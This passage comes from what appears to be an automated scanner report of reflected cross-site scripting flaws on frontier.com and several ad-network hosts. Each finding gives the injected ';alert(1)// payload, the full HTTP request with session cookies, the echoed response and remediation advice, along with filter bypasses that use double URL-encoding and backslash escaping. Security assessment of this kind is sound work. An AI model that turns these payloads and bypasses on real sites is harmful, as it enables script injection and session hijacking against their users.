GET /Images7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3/2011promo/bg-grey.jpg HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images7327a';alert(1)//2dd01931fc3/2011promo/bg-grey.jpg');//]]> ...[SNIP]...
2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Images/2011promo/bg-grey.jpg
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 611ec%2527%253balert%25281%2529%252f%252f635909959d4 was submitted in the REST URL parameter 2. This input was echoed as 611ec';alert(1)//635909959d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/2011promo611ec%2527%253balert%25281%2529%252f%252f635909959d4/bg-grey.jpg HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo611ec';alert(1)//635909959d4/bg-grey.jpg');//]]> ...[SNIP]...
2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Images/2011promo/bg-grey.jpg
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde47%2527%253balert%25281%2529%252f%252fcff2b560950 was submitted in the REST URL parameter 3. This input was echoed as cde47';alert(1)//cff2b560950 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/2011promo/bg-grey.jpgcde47%2527%253balert%25281%2529%252f%252fcff2b560950 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpgcde47';alert(1)//cff2b560950');//]]> ...[SNIP]...
2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Images/2011promo/bg-grey.jpg
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de098'%3balert(1)//67697fc3289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de098';alert(1)//67697fc3289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Images/2011promo/bg-grey.jpg?de098'%3balert(1)//67697fc3289=1 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpg?de098';alert(1)//67697fc3289=1');//]]> ...[SNIP]...
2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://frontier.com
Path: /Shop/Login.aspx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866b2'%3b64e0a78ddc1 was submitted in the REST URL parameter 1. This input was echoed as 866b2';64e0a78ddc1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Shop866b2'%3b64e0a78ddc1/Login.aspx HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop866b2';64e0a78ddc1/Login.aspx');//]]> ...[SNIP]...
2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Shop/Login.aspx
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 was submitted in the REST URL parameter 2. This input was echoed as eb7ff';alert(1)//4743277aa69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Shop/Login.aspxeb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Shop/Login.aspxeb7ff';alert(1)//4743277aa69');//]]> ...[SNIP]...
2.40. http://frontier.com/winwin1 [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /winwin1
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965 was submitted in the REST URL parameter 1. This input was echoed as d97a2';alert(1)//5a9a39ab965 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /winwin1d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/winwin1d97a2';alert(1)//5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110');//]]> ...[SNIP]...
2.41. http://frontier.com/winwin1 [mkwid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /winwin1
Issue detail
The value of the mkwid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cd51'%3balert(1)//f8a5646b3ab was submitted in the mkwid parameter. This input was echoed as 4cd51';alert(1)//f8a5646b3ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ04cd51'%3balert(1)//f8a5646b3ab&pcrid=14742396110 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ04cd51';alert(1)//f8a5646b3ab&pcrid=14742396110');//]]> ...[SNIP]...
2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /winwin1
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2473b'%3balert(1)//867912431c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2473b';alert(1)//867912431c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110&2473b'%3balert(1)//867912431c1=1 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=14742396110&2473b';alert(1)//867912431c1=1');//]]> ...[SNIP]...
2.43. http://frontier.com/winwin1 [pcrid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /winwin1
Issue detail
The value of the pcrid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59505'%3balert(1)//f0a2d5e98b9 was submitted in the pcrid parameter. This input was echoed as 59505';alert(1)//f0a2d5e98b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ0&pcrid=1474239611059505'%3balert(1)//f0a2d5e98b9 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=1474239611059505';alert(1)//f0a2d5e98b9');//]]> ...[SNIP]...
2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://games.frontier.com
Path: /WebAnalysis/APP/GenerateCode.ashx
Issue detail
The value of the lc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 434e0\'%3balert(1)//c3ce629f4e0 was submitted in the lc parameter. This input was echoed as 434e0\\';alert(1)//c3ce629f4e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=game&code=119282623&lc=en434e0\'%3balert(1)//c3ce629f4e0&channel=110464377 HTTP/1.1 Host: games.frontier.com Proxy-Connection: keep-alive Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 3416 Cache-Control: private, max-age=14400 Date: Tue, 06 Sep 2011 12:50:58 GMT Connection: close
try{var s_account='oberonfrontier'; var s=s_gi(s_account); GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus ...[SNIP]... ents,eVar1,eVar2,prop1,eVar7,eVar11,eVar10,prop10,eVar6"; s.linkTrackEvents = "event1"; s.dc = 112; s.eVar10 = s_account; s.prop10 = s_account; s.campaign = '' ; s.prop1 = 'WebAnalysis' ; s.prop2 = 'en434e0\\';alert(1)//c3ce629f4e0' ; s.prop3 = '/WebAnalysis/APP/GenerateCode.ashx' ; GameCatalog.WebAnalysis.SiteTracking['game']= { 'pageName' : 'GamePage - [Mystery Age Imperial Staff]' , 'products' : ';Mystery Age Imperial Staff' ...[SNIP]...
2.45. http://ib.adnxs.com/seg [redir parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ib.adnxs.com
Path: /seg
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c810'%3balert(1)//01b28dbf622 was submitted in the redir parameter. This input was echoed as 2c810';alert(1)//01b28dbf622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seg?add=155746&redir=${SEG_IDS}2c810'%3balert(1)//01b28dbf622&t=1 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=-18; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0uQsu#'0AK.2BD)8JE^N(7nZs3ht</s2t.vO)!%C9MfYBDro4%$RXj*VXG`FnPjma[wF*_)<q[y1WP9e8pC8`#5O?0/><2+:3wu0usM@nf1dht<oQOZgDK+C#1JIHqN@hU=SVr%o_v%pV$Tn'!-5)NXI#wq; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Tue, 06 Sep 2011 12:46:31 GMT Content-Length: 484
document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c ...[SNIP]... <scr'+'ipt type="text/javascript" src="${SEG_IDS}2c810';alert(1)//01b28dbf622"> ...[SNIP]...
2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]
Summary
Severity: High
Confidence: Certain
Host: http://img.mediaplex.com
Path: /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fa3a"%3balert(1)//ba80aca61be was submitted in the mpck parameter. This input was echoed as 5fa3a";alert(1)//ba80aca61be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
